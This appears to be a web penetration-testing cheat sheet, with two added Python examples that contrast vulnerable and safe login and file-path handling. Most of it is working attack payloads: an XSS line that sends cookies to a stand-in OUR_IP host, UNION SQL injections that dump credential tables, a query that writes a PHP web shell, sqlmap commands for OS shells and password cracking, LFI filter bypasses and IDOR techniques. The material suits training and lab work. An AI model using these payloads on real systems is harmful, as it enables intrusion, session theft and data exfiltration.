Part 1
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
Payload | Description
--- | ---
`<script>alert(window.origin)</script>` | Basic XSS payload
`<plaintext>` | Basic XSS payload
`<script>print()</script>` | Basic XSS payload
`<img src="" onerror=alert(window.origin)>` | HTML-based XSS payload
`<script>document.body.style.background = "#141d2b"</script>` | Change background color
`<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>` | Change background image
`<script>document.title = 'HackTheBox Academy'</script>` | Change website title
`<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>` | Overwrite the website's main body
`<script>document.getElementById('urlform').remove();</script>` | Remove a specific HTML element
`<script src="http://OUR_IP/script.js"></script>` | Load a remote script
`<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` | Send cookie details to us
`<iframe src=file:///C:/windows/win.ini>` | Load a local ini file via an iframe tag (file:// URI)
Login Form Injection
Command | Description
--- | ---
`curl -isk "https://site.com"` | Test for the status of the Content Security Policy

Serve an XSS payload from an XML file:

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://www.w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

Sample XSS Polyglot
How to perform basic Login Form Injection via Reflected XSS
Step 1: Test the vulnerable form for the remove function by running the script in the console (Dev Tools).
Step 2: Inject a form into the webpage with the XSS payload by executing the below script in the console (Dev Tools).
After successfully authenticating to a SQL Server, it is worth verifying whether xp_cmdshell has already been enabled:
If xp_cmdshell has not been enabled, run the below commands to enable it and run Windows command-shell commands from within SQL:
Basic SQL Testing
Keyword | Description
--- | ---
`SELECT` | Select data from a database
`FROM` | Specify the table to retrieve data from
`WHERE` | Filter the query to match a given condition
`INSERT` | Add a single row to a table
`CREATE` | Create a TABLE, DATABASE, INDEX or VIEW
`ALTER TABLE` | Add/remove columns from a table
`UPDATE` | Update table data
`DELETE` | Delete rows from a table
`AS` | Rename a column/table with an alias
`JOIN` | Combine rows from two or more tables
`AND` | Combine query conditions (all conditions must be met)
`OR` | Combine query conditions (only one must be met)
`LIMIT` | Limit the number of rows returned
`IN` | Specify multiple values (only used with WHERE)
`CASE` | Return a value on a specified condition
`IS NULL` | Return only rows with a NULL value
`LIKE` | Search for a pattern in a column
`COMMIT` | Write a transaction to the database
`ROLLBACK` | Undo a transaction
`DROP` | Delete a TABLE, DATABASE or INDEX
`GROUP BY` | Group data into logical sets
`ORDER BY` | Set the order of results
`HAVING` | Functions like WHERE but filters groups
`COUNT` | Count rows
`SUM` | Return the sum of a column
`AVG` | Return the average of a column
`MIN` | Return the minimum value of a column
`MAX` | Return the maximum value of a column
MySQL Basics
General
Command | Description
--- | ---
`mysql -u root -h docker.hackthebox.eu -P 3306 -p` | Log in to a MySQL database
`SHOW DATABASES` | List available databases
`USE users` | Switch to a database
Tables
Command | Description
--- | ---
`CREATE TABLE logins (id INT, ...)` | Add a new table
`SHOW TABLES` | List available tables in the current database
`DESCRIBE logins` | Show table properties and columns
`INSERT INTO table_name VALUES (value_1,..)` | Add values to a table
`INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` | Add values to specific columns in a table
`UPDATE table_name SET column1=newvalue1, ... WHERE <condition>` | Update table values
Columns
Command | Description
--- | ---
`SELECT * FROM table_name` | Show all columns in a table
`SELECT column1, column2 FROM table_name` | Show specific columns in a table
`DROP TABLE logins` | Delete a table
`ALTER TABLE logins ADD newColumn INT` | Add a new column
`ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename a column
`ALTER TABLE logins MODIFY oldColumn DATE` | Change a column's datatype
`ALTER TABLE logins DROP oldColumn` | Delete a column
Output
Command | Description
--- | ---
`SELECT * FROM logins ORDER BY column_1` | Sort by a column
`SELECT * FROM logins ORDER BY column_1 DESC` | Sort by a column in descending order
`SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two columns
`SELECT * FROM logins LIMIT 2` | Only show the first two results
`SELECT * FROM logins LIMIT 1, 2` | Only show two results, starting from the second row (offset 1)
`SELECT * FROM table_name WHERE <condition>` | List results that meet a condition
`SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name matches a given pattern
MySQL Operator Precedence (highest first)
1. Division (/), Multiplication (*), and Modulus (%)
2. Addition (+) and Subtraction (-)
3. Comparison (=, >, <, <=, >=, !=, LIKE)
4. NOT (!)
5. AND (&&)
6. OR (||)
SQL Injection
Auth Bypass
Payload | Description
--- | ---
`admin' or '1'='1` | Basic auth bypass
`admin')-- -` | Basic auth bypass with comments
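Why the first payload above works, and what closes the hole, as an added example that is not part of the original cheat sheet. It uses the standard-library sqlite3 module with a constructed in-memory users table (schema and credentials are made up here); the same precedence rule listed further down this page, AND binding tighter than OR, is what turns the injected `or '1'='1` into a password bypass.

```python
"""Added example: string-built login query beside its parameterized form.

The users table and credentials are constructed for this demonstration.
"""
import sqlite3

SAMPLE_ROWS = [("admin", "correct-horse-battery"), ("alice", "wonderland")]  # constructed


def make_db() -> sqlite3.Connection:
    """Create a throwaway database with a plaintext password column.

    Real systems store a salted password hash; plaintext is used here only so
    the query logic stays visible.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: the input becomes part of the SQL grammar.

    With username = "admin' or '1'='1" the WHERE clause becomes
        username = 'admin' or '1'='1' AND password = '...'
    and because AND binds tighter than OR, the row for 'admin' matches
    regardless of the password.
    """
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the driver passes values separately from the statement
    text, so a quote in the input is just a character inside a string value."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def compare(payload: str = "admin' or '1'='1") -> dict:
    """Run the same payload against both implementations and report the outcome."""
    conn = make_db()
    return {
        "vulnerable_accepts_payload": login_vulnerable(conn, payload, "not-the-password"),
        "safe_accepts_payload": login_safe(conn, payload, "not-the-password"),
        "safe_accepts_real_credentials": login_safe(conn, "admin", "correct-horse-battery"),
    }


if __name__ == "__main__":
    print(compare())
```

The second payload on the page (`admin')-- -`) depends on the original query wrapping the condition in parentheses, so it is not exercised against this simpler query; the defence is the same in both cases.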
Union Injection
Payload | Description
--- | ---
`' order by 1-- -` | Detect the number of columns using ORDER BY
`cn' UNION select 1,2,3-- -` | Detect the number of columns using a UNION injection
`cn' UNION select 1,@@version,3,4-- -` | Basic UNION injection
`UNION select username, 2, 3, 4 from passwords-- -` | UNION injection for 4 columns
DB Enumeration
Payload | Description
--- | ---
`SELECT @@version` | Fingerprint MySQL with query output
`SELECT SLEEP(5)` | Fingerprint MySQL with no output
`cn' UNION select 1,database(),2,3-- -` | Current database name
`cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases
`cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database
`cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table
`cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database
Privileges
Payload | Description
--- | ---
`cn' UNION SELECT 1, user(), 3, 4-- -` | Find the current user
`cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find whether the user has admin privileges
`cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -` | Find all user privileges
`cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL
File Injection
Payload | Description
--- | ---
`cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read a local file
`select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file
`cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory
NoSQL Basics
Command | Description
--- | ---
`show dbs;` | List all the databases present
`use user_creds;` | Switch to the database named "user_creds"
`show collections;` | List the collections in a database
`db.flag.find().pretty()` | Dump the contents of the documents in the flag collection
`http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto` | Basic NoSQLi login
SQLmap
Command | Description
--- | ---
`sqlmap -h` | View the basic help menu
`sqlmap -hh` | View the advanced help menu
`sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` | Run SQLMap without asking for user input
`sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` | SQLMap with a POST request
`sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'` | POST request specifying an injection point with an asterisk
`sqlmap -r req.txt` | Pass an HTTP request file to SQLMap
`sqlmap ... --cookie='PHPSESSID=abcdefghijklmnop'` | Specify a cookie header
`sqlmap -u www.target.com --data='id=1' --method PUT` | Specify a PUT request
`sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` | Store traffic to an output file
`sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` | Specify the verbosity level
`sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` | Specify a prefix or suffix
`sqlmap -u www.example.com/?id=1 -v 3 --level=5` | Specify the level and risk
`sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba` | Basic DB enumeration
`sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` | Table enumeration
`sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname` | Table/row enumeration
`sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"` | Conditional enumeration
`sqlmap -u "http://www.example.com/?id=1" --schema` | Database schema enumeration
`sqlmap -u "http://www.example.com/?id=1" --search -T user` | Searching for data
`sqlmap -u "http://www.example.com/?id=1" --passwords --batch` | Password enumeration and cracking
`sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` | Anti-CSRF token bypass
`sqlmap --list-tampers` | List all tamper scripts
`sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` | Check for DBA privileges
`sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a local file
`sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` | Writing a file
`sqlmap -u "http://www.example.com/?id=1" --os-shell` | Spawning an OS shell
WAF BYPASSES
Passwords
LFI workaround PoC
LFI via this path does not work at first:
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing characters with the ? wildcard you may receive a successful response (200):
/fileRead.jsp?fileName=/?tc/?asswd (200)
fileRead.jsp?fileName=/??c/??sswd (200)
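The 406-then-200 pattern above is what a substring denylist looks like from the outside: the filter rejects the literal path but never sees the spelling the file layer later resolves. The following added example (not from the original page) puts such a denylist next to a canonical-path allowlist that checks the resolved path against a serving directory; WEB_ROOT, the blocked strings and the sample file names are constructed for the demonstration.

```python
"""Added example: substring denylist vs canonical-path allowlist for a file parameter.

WEB_ROOT, BLOCKED_SUBSTRINGS and all sample names are constructed values.
"""
import posixpath

WEB_ROOT = "/var/www/public"                    # hypothetical directory the handler serves from
BLOCKED_SUBSTRINGS = ("/etc/passwd", "../")      # constructed denylist
GLOB_AND_NUL = set("?*[]\x00")                   # shell-style wildcards and NUL


def denylist_allows(file_name: str) -> bool:
    """Reject only requests that contain a known-bad substring.

    This matches the literal '/etc/passwd' but not a rewritten spelling such as
    '/?tc/?asswd': the filter inspects the raw string, while the file layer may
    interpret the wildcards, so the check and the open disagree about the target.
    """
    return not any(bad in file_name for bad in BLOCKED_SUBSTRINGS)


def allowlist_allows(file_name: str, root: str = WEB_ROOT) -> bool:
    """Accept only a relative, metacharacter-free name that still resolves
    inside root after normalisation.

    There is no list of bad strings to work around: whatever the spelling, a
    path that does not land under root is refused, and the root itself is not
    served as a file.
    """
    if not file_name or file_name.startswith("/") or GLOB_AND_NUL & set(file_name):
        return False
    candidate = posixpath.normpath(posixpath.join(root, file_name))
    return candidate != root and posixpath.commonpath([root, candidate]) == root


def classify(file_name: str) -> dict:
    """Report how each policy treats one requested name."""
    return {
        "requested": file_name,
        "denylist_allows": denylist_allows(file_name),
        "allowlist_allows": allowlist_allows(file_name),
    }


if __name__ == "__main__":
    for name in ("/etc/passwd", "/?tc/?asswd", "../../etc/passwd", "docs/readme.txt"):
        print(classify(name))
```

posixpath is used instead of os.path so the normalisation behaves the same on every platform; in a real handler the same check would run on the resolved path, and the open itself should happen with a file API that does not expand wildcards.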
Fuzzing Parameters
LFI Wordlists
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
Local File Inclusion (LFI)
Basic Bypasses
PHP Filters
PHP Wrappers
Data Wrapper
The data wrapper is only available if the allow_url_include setting is enabled in the PHP configuration.
Input Wrapper
The target must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting.
Expect Wrapper
Remote File Inclusion (RFI)
LFI & File Uploads
Image Upload
ZIP Upload
PHAR Upload
Log Poisoning
PHP Session Poisoning
Server Log Poisoning
File Inclusion Parameters
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Find and replace IDs in URLs, headers and body: /users/01 => /users/02
Try parameter pollution: users=01 => users=01&users=02
Special characters: /users/01* or /users/* => disclosure of every single user
Try older versions of API endpoints: /api/v3/users/01 => /api/v1/users/02
Add an extension: /users/01 => /users/02.json
Change request methods: POST /users/01 => GET, PUT, PATCH, DELETE, OPTIONS, etc.
Check if the Referer or other headers are used to validate IDs
Encrypted IDs: if the application is using encrypted IDs, try to decrypt them using a hashing/cracking tool
Send a wildcard: {"user_id":"*"}
Send the ID twice: URL?id=&id=
JSON wrap: {"id":111} --> {"id":{"id":111}}
Wrap the ID with an array: {"id":111} --> {"id":[111]}
Swap a GUID with a numeric ID or email: /users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX => /users/02 or /users/a@b.com
Try GUIDs such as 00000000-0000-0000-000000000000 and 11111111-1111-1111-111111111111
GUID enumeration: try to disclose GUIDs using Google Dorks, GitHub, Wayback, Burp history
If none of the GUID enumeration methods work, try SignUp, Reset Password and other endpoints and analyze the responses. An endpoint may disclose a user's GUID within the application.
When a server responds with a 401/403, the action may still be performed. Verify the function within the application.
Blind IDORs: look for endpoints/features that may disclose information
Chain IDOR with XSS for account takeovers